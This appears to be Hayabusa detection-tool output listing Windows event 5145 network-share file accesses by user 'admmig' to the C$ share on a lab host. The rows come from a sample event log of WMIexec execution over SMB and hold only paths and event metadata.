2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.298 
